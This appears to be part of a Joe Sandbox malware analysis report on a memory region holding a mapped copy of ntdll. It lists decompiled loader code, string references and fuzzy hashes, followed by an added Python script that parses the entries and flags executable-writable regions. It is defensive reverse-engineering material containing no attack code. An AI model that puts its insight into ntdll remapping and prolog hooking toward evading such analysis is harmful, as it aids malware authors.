                                          					// STATUS_NO_SUCH_FILE (0xc000000f), STATUS_RESOURCE_LANG_NOT_FOUND (0xc0000204),
                                          					// STATUS_NOT_IMPLEMENTED (0xc0000002) and STATUS_NOT_SUPPORTED (0xc00000bb) are logged
                                          					// when enabled and reset to 0; any other status is kept and reported at L9.
                                          					if(_t49 != 0xc000008a) {
                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                          							if(_t49 != 0xc00000bb) {
                                          								goto L8;
                                          							}
                                          						}
                                          					}
                                          					if(( *0x1a45780 & 0x00000005) != 0) {
                                          						_push(_t49);
                                          						E019D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                          						_t53 = _t53 + 0x1c;
                                          					}
                                          					_t49 = 0;
                                          					goto L8;
                                          				} else {
                                          					goto L9;
                                          				}
                                          			}

                                          Instruction addresses of the C-Code lines above: 0x01988e0f-0x01988ed2 (main body) and 0x019c92aa-0x019c9381 (out-of-line blocks).

                                          Strings
                                          • LdrpFindDllActivationContext, xrefs: 019C9331, 019C935D
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 019C933B, 019C9367
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 019C932A
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 019C9357
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpDoPostSnapWork, xrefs: 019B9C1E
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 019B9C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 019B9C18
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • HEAP[%wZ]: , xrefs: 019CA0AD
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 019CA0CD
                                          • HEAP: , xrefs: 019CA0BA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpCompleteMapModule, xrefs: 019B9898
                                          • minkernel\ntdll\ldrmap.c, xrefs: 019B98A2
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 019B9891
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • InstallLanguageFallback, xrefs: 0195E6DB
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0195E68C
                                          • @, xrefs: 0195E6C0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197B9A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 019CBE0F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Critical error detected %lx, xrefs: 01A08E21
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: ad08431768338463a406ecdaf9d93b2a52fc25bed5e59f59ec3f022dbe9f3bbe
                                          • Instruction ID: 94431a90587fecead8414b42adc4e64fd315be4601bb4213305ba2270d5d037d
                                          • Opcode Fuzzy Hash: ad08431768338463a406ecdaf9d93b2a52fc25bed5e59f59ec3f022dbe9f3bbe
                                          • Instruction Fuzzy Hash: FE1179B5D40348DBDB26CFA8990579DBBF0BB54714F24421DE128AB282C3344A05CF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 019EFF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: 144dcfca250ecf4515c4ce190482fcacdf2abda03717e8fe97a031f022fe20d1
                                          • Instruction ID: 6ef8794f9f97b19d65f4ea238179fc16e02afc5921b02698051e2abd6046d98e
                                          • Opcode Fuzzy Hash: 144dcfca250ecf4515c4ce190482fcacdf2abda03717e8fe97a031f022fe20d1
                                          • Instruction Fuzzy Hash: 66110075950244EFEB22EF94C948F98BBF1FF88705F558854F10C6B6A1C7399944CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%
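
The three entries just above are the only ones in this stretch of the report that carry strings, and the strings are worth a second look: "NTDLL: Calling thread (%p) not owner of CritSect ..." and "Critical error detected %lx" are ntdll.dll's own format strings (RtlpNotOwnerCriticalSection and RtlReportCriticalFailure). Together with "based on PE: true" for a region at 01930000 in process 3, that points to the dumped region being a privately mapped copy of ntdll rather than the sample's own code, which fits the "Modifies the prolog of user mode functions" signature; this is an inference from the visible strings, not something the report states. The script below is an added example, not part of the Joe Sandbox report: it parses entries in this section's layout into records, decodes the .sdmp filename, flags PAGE_EXECUTE_READWRITE regions, converts a string xref into an offset inside the dump file, and recognises the ntdll markers. The sdmp field layout is an assumption (the process index is the first field and the fourth field equals the printed Offset, both of which the page supports; reading the fifth field as the region's PAGE_* protection is my assumption). The sample text is copied from two entries above.

```python
"""Parse Joe Sandbox "Memory Dump Source" function entries and triage them.
Added example, not the report's own tooling. Assumptions are marked inline."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

PAGE_EXECUTE_READWRITE = 0x40  # winnt.h constant, certain

# Format strings that belong to ntdll.dll itself; a region whose functions
# reference them is most likely a copy of ntdll, not the sample's own code.
NTDLL_MARKERS = (
    "NTDLL: Calling thread (%p) not owner of CritSect",
    "Critical error detected %lx",
)

# Constructed input: two entries copied verbatim from the report above.
SAMPLE = """\
Strings
• Critical error detected %lx, xrefs: 01A08E21
Memory Dump Source
• Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
Similarity
• API ID:
• String ID: Critical error detected %lx
• API String ID: 0-802127002
• Opcode ID: ad08431768338463a406ecdaf9d93b2a52fc25bed5e59f59ec3f022dbe9f3bbe
• Instruction ID: 94431a90587fecead8414b42adc4e64fd315be4601bb4213305ba2270d5d037d
• Opcode Fuzzy Hash: ad08431768338463a406ecdaf9d93b2a52fc25bed5e59f59ec3f022dbe9f3bbe
• Instruction Fuzzy Hash: FE1179B5D40348DBDB26CFA8990579DBBF0BB54714F24421DE128AB282C3344A05CF18
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dff02dc2a3b041b388447bb903552001592cfcb5d1bd1c98b2a02276c10b6c1d
• Instruction ID: 6c1da0057fe850037c1217b85ba5e1ec0cf4228fa94a09c6bfdae6a726bb1d0c
• Opcode Fuzzy Hash: dff02dc2a3b041b388447bb903552001592cfcb5d1bd1c98b2a02276c10b6c1d
• Instruction Fuzzy Hash: 8B422775D012298FDB24CF6CC880BA9BBB1FF49314F1481AAD94DAB242E775A985CF50
Uniqueness

Uniqueness Score: -1.00%
"""


@dataclass
class DumpSource:
    name: str
    proc_index: int   # 1st filename field; matches the analysed process number
    base: int         # 4th field; equals the "Offset" the report prints
    protection: int   # 5th field; ASSUMED to be the region's PAGE_* protection
    based_on_pe: bool


@dataclass
class FunctionEntry:
    source: DumpSource
    opcode_id: str
    instr_fuzzy: str
    strings: List[Tuple[str, int]] = field(default_factory=list)  # (text, xref VA)


_SRC = re.compile(r"Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
_XREF = re.compile(r"^• (.+), xrefs: ([0-9A-Fa-f]+)$", re.M)


def parse_sdmp_name(name: str, offset_hex: str, based_on_pe: bool) -> DumpSource:
    """Split the dotted .sdmp name and cross-check its base against the printed Offset."""
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 6:
        raise ValueError(f"unexpected sdmp name layout: {name}")
    base = int(fields[3], 16)
    if base != int(offset_hex, 16):
        raise ValueError("base address in filename disagrees with printed Offset")
    return DumpSource(name, int(fields[0]), base, int(fields[4], 16), based_on_pe)


def parse_entries(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'Uniqueness Score' block; strings precede 'Memory Dump Source'."""
    entries = []
    for chunk in re.split(r"Uniqueness Score: [^\n]*", text):
        m = _SRC.search(chunk)
        if not m:
            continue
        src = parse_sdmp_name(m.group(1), m.group(2), m.group(3) == "true")
        head = chunk.partition("Memory Dump Source")[0]
        strings = [(s, int(x, 16)) for s, x in _XREF.findall(head)]
        opcode = re.search(r"Opcode ID: ([0-9a-f]{64})", chunk).group(1)
        fuzzy = re.search(r"Instruction Fuzzy Hash: ([0-9A-F]+)", chunk).group(1)
        entries.append(FunctionEntry(src, opcode, fuzzy, strings))
    return entries


def is_rwx(src: DumpSource) -> bool:
    return src.protection == PAGE_EXECUTE_READWRITE


def dump_file_offset(src: DumpSource, va: int) -> Optional[int]:
    """Offset of a VA inside the dump file. The report gives no region size,
    so only addresses at or above the base can be located."""
    return va - src.base if va >= src.base else None


def looks_like_ntdll_copy(entries: List[FunctionEntry]) -> bool:
    return any(s.startswith(NTDLL_MARKERS) for e in entries for s, _ in e.strings)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        for text, va in e.strings:
            print(f"{text!r} @ {va:08X} -> dump offset {dump_file_offset(e.source, va):#x}")
    print("RWX region:", is_rwx(parsed[0].source), "| ntdll copy:", looks_like_ntdll_copy(parsed))
```

Run it against the full "Execution Graph" text of the report to get a dump-file offset for every string xref, which is what you need to seek to in the .sdmp when confirming whether the region is an unmodified ntdll image or one whose function prologues have been rewritten.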

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dff02dc2a3b041b388447bb903552001592cfcb5d1bd1c98b2a02276c10b6c1d
                                          • Instruction ID: 6c1da0057fe850037c1217b85ba5e1ec0cf4228fa94a09c6bfdae6a726bb1d0c
                                          • Opcode Fuzzy Hash: dff02dc2a3b041b388447bb903552001592cfcb5d1bd1c98b2a02276c10b6c1d
                                          • Instruction Fuzzy Hash: 8B422775D012298FDB24CF6CC880BA9BBB1FF49314F1481AAD94DAB242E775A985CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f341312f377394c6ae65841c37a06aa09c542d36575b23eb15e6a6a2f4b7a0cb
                                          • Instruction ID: 2cd6ebc4330ea0a2b6b8fd6415f6ed2a114b7012ef50311385fa60777b5f6d03
                                          • Opcode Fuzzy Hash: f341312f377394c6ae65841c37a06aa09c542d36575b23eb15e6a6a2f4b7a0cb
                                          • Instruction Fuzzy Hash: A1F19E706082118FC725CF18C580ABAB7E9FF98715F15492EF98ECB252E734D891CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5a2e0ecd00600bc249a0f02feac247fec11813ef3a862f70e68f9a0ce0d54fe
                                          • Instruction ID: b386acd337f3c1eb354c9edbbd9368984ecb59d7626cf1733d493542329ad319
                                          • Opcode Fuzzy Hash: a5a2e0ecd00600bc249a0f02feac247fec11813ef3a862f70e68f9a0ce0d54fe
                                          • Instruction Fuzzy Hash: 6BF115356083019FEB26DF2CC440B6A7BE9BFC5725F15891DE99D9B281D734E841CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73fb1f98d97ceb975b00704f95e64dcadec15f3212625dadc0a72263a0c3d865
                                          • Instruction ID: c01c047cd55c7e63eac6e7e7337367880c93a32d921e256ddb858c51d71ac154
                                          • Opcode Fuzzy Hash: 73fb1f98d97ceb975b00704f95e64dcadec15f3212625dadc0a72263a0c3d865
                                          • Instruction Fuzzy Hash: 8CE1F374B01359CFEB24CF58C984BA9B7FABF81304F040199D95E97291D7389D81CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70f0d6e92cd58212bc149e3adcc1859a424fbac344960667b0bb96fb27b02bb9
                                          • Instruction ID: 6f461174a29bcbd22dc804b9ca1983d5b288b2bfa341e501b4c6340fd6bc03a9
                                          • Opcode Fuzzy Hash: 70f0d6e92cd58212bc149e3adcc1859a424fbac344960667b0bb96fb27b02bb9
                                          • Instruction Fuzzy Hash: A4B16FB4E00359DFDB15DFE9C984AADBBB9FF88304F104529E509AB245D770AD42CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eadd7d803f22eb073a820828bcbe982aec66f609ad2ac08916f67e3889e6de02
                                          • Instruction ID: bb2bffc8834f7fb8f7fddc64c3d287df08a2584ee0885ce1bf9691e80b3367cb
                                          • Opcode Fuzzy Hash: eadd7d803f22eb073a820828bcbe982aec66f609ad2ac08916f67e3889e6de02
                                          • Instruction Fuzzy Hash: 29C111755083818FE354CF28C580A6AFBE1BF88704F184A6EF9998B352D771E945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8333b891058085fd3555cfff4f16aa8c2282b0a5027c62b62e868a42184b8ea7
                                          • Instruction ID: c6257aba80004eb4c366b1a232c9a5a1afb2b4f178a5113c6548beb638979c88
                                          • Opcode Fuzzy Hash: 8333b891058085fd3555cfff4f16aa8c2282b0a5027c62b62e868a42184b8ea7
                                          • Instruction Fuzzy Hash: CA918D31F402159FEB31EB7CC854BAD7BA8AF41B25F090269F958AB2D1E7349C04C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8037ea78622a17898432354202f9626824fcade1fa1b40f51c6be20764c062f9
                                          • Instruction ID: 257bfaf4f60c754bbdbf282482949d784575622bd221f11d225fdb0e9beb933e
                                          • Opcode Fuzzy Hash: 8037ea78622a17898432354202f9626824fcade1fa1b40f51c6be20764c062f9
                                          • Instruction Fuzzy Hash: 5F8175756042029BDB2ACE98C880E7A77E9FB84A95F14485DEE8D9B241D330DD41CFA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a22324c1eac55a4cd86e188e806724a04fe7b51e906b5388b8c988ffc4170f92
                                          • Instruction ID: e1c9bfc35f3d1edf1c459b618f0a051ce6155434bad9d7699fe8e4c59d00ce60
                                          • Opcode Fuzzy Hash: a22324c1eac55a4cd86e188e806724a04fe7b51e906b5388b8c988ffc4170f92
                                          • Instruction Fuzzy Hash: B871D032200706EFEB33DF19C848F56BBE9EB80725F144928E65E976A0DB71E941CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: 69a4d1140d03ad83534ec4f71124a37fae6d186ee245ece70ea1a50a354d7333
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: D7716F71A00619EFDB14DFA9C984EEEBBB9FF88714F104469E509E7250DB34EA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89fb1efda29d3aa40c10b71a17345a8aad482878965b373a772be29c7c20c2f4
                                          • Instruction ID: 01d24ff5a341b2f80043606be2787ec9f0ce20ae950c45154065a5eb33a517fc
                                          • Opcode Fuzzy Hash: 89fb1efda29d3aa40c10b71a17345a8aad482878965b373a772be29c7c20c2f4
                                          • Instruction Fuzzy Hash: 3D51BC75205382AFD721EF68C941B27BBA8FF90710F14491EF89997652E774E804CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 858b5ceca6fb5caba0d197a4b417a040287676f32463cc0a78a242f47f32ba8b
                                          • Instruction ID: 99dae6036a6347689ced8a1da72fd842352e424d61f5ff32fc90c21c49a79b6a
                                          • Opcode Fuzzy Hash: 858b5ceca6fb5caba0d197a4b417a040287676f32463cc0a78a242f47f32ba8b
                                          • Instruction Fuzzy Hash: 8D51C27AB01115CFCB15EF5CC8809BDB7F1FB89700715845AE89ADB315E734AA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd58558b8fa257f87f6f6ef4c103e00d8d81972036d1f3bbd3ba5722955c8346
                                          • Instruction ID: 4c6d1ed5b558ebc1cef2378096bf9f311313914e8aec4aaafd6ec960782fc067
                                          • Opcode Fuzzy Hash: cd58558b8fa257f87f6f6ef4c103e00d8d81972036d1f3bbd3ba5722955c8346
                                          • Instruction Fuzzy Hash: D641F8B17022919BD72ADB2DC994B3FB79AEF94620F088219F956C72D8DB34D801C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7c2a7a0aadea83507fe3d0b0c8868fb66ed9e762b6c33869eb1e178637283e0
                                          • Instruction ID: 5dcf2ddc490b6f5f74891642c47366df4f84005b71ad30f3ba978ca53019a6f1
                                          • Opcode Fuzzy Hash: f7c2a7a0aadea83507fe3d0b0c8868fb66ed9e762b6c33869eb1e178637283e0
                                          • Instruction Fuzzy Hash: 3251AE75E00606CFCB15CFACC480AAEFBF5BF88310F24855AD959A7344DB31A944CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: 39a1ed68133a8c81e777d7d0cbb3815b3ea992a9964c3363bf381c1f89b63556
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: 61511534E04249EFEB25CB6CD1E0BEEBBB9AF05315F1881A8D54D53282C375A989C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: 56561f1104a34d17945ce50dc7fd1ed46a7dded72fdffc2c5d900f7b59d4f823
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: 13518D71600646EFDB16CF68C480A96FBF5FF55304F18C1AAE9089F212E371EA46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

